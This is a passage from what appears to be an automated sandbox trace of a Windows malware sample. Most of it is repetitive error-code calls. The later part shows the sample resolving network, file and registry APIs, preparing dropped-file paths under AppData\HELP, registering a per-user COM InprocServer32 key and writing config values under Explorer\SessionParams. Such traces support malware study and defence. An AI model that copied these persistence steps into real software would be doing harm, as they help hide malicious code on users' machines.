SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.394] GetLastError () returned 0x0 [0033.394] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.395] SetLastError (dwErrCode=0x0) [0033.395] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.396] GetLastError () returned 0x0 [0033.396] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.397] GetLastError () returned 0x0 [0033.397] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.398] GetLastError () returned 0x0 [0033.398] SetLastError (dwErrCode=0x0) [0033.412] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.413] SetLastError (dwErrCode=0x0) [0033.413] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.414] SetLastError (dwErrCode=0x0) [0033.414] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.415] SetLastError (dwErrCode=0x0) [0033.415] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.416] GetLastError () returned 0x0 [0033.416] SetLastError (dwErrCode=0x0) [0033.417] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.417] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.417] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.418] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af860 | out: lpSystemTimeAsFileTime=0x2af860*(dwLowDateTime=0xe19b49b0, dwHighDateTime=0x1d3dfba)) [0033.418] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af798, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.418] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af680, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.418] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetLastError () returned 0x0 [0033.419] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.419] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.419] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.419] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.419] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.419] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.419] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.419] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.419] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.419] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.420] GetLastError () returned 0xb7 [0033.420] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.420] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.420] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.420] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.420] wsprintfA (in: param_1=0x2af500, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.420] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.420] wsprintfA (in: param_1=0x2af3fc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.420] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.420] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.420] CloseHandle (hObject=0x74) returned 1 [0033.420] GetLastError () returned 0x0 [0033.420] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.420] GetLastError () returned 0x0 [0033.420] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.420] GetSystemDirectoryA (in: lpBuffer=0x2af500, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.420] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.421] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.421] CloseHandle (hObject=0x74) returned 1 [0033.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.421] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.421] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.422] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.422] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.422] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.422] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.422] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.422] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.422] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.423] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.424] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.424] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.424] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.424] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.424] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.424] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.424] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.424] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.424] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.424] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.425] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.425] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.425] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.425] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.425] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.425] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.425] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.425] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.425] GetVersionExW (in: lpVersionInformation=0x2afa84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2afa84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0033.425] GetLastError () returned 0x7f [0033.425] SetLastError (dwErrCode=0x7f) [0033.425] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2af778, lpdwDisposition=0x0 | out: phkResult=0x2af778*=0x7c, lpdwDisposition=0x0) returned 0x0 [0033.426] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="Install", cbData=0x10 | out: lpData="Install") returned 0x0 [0033.426] GetLastError () returned 0x7f [0033.426] GetLastError () returned 0x7f [0033.426] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2af884, lpdwDisposition=0x2af9e0 | out: phkResult=0x2af884*=0x80, lpdwDisposition=0x2af9e0*=0x2) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x2af888*=0xe10, cbData=0x4 | out: lpData=0x2af888*=0xe10) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x2af888*=0x1, cbData=0x4 | out: lpData=0x2af888*=0x1) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x2af92c*, cbData=0x58 | out: lpData=0x2af92c*) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x2af984*, cbData=0x5c | out: lpData=0x2af984*) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0033.426] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0033.426] RegCloseKey (hKey=0x80) returned 0x0 [0033.428] HeapDestroy (hHeap=0x790000) returned 1 Process: id = "34" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fac0" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS 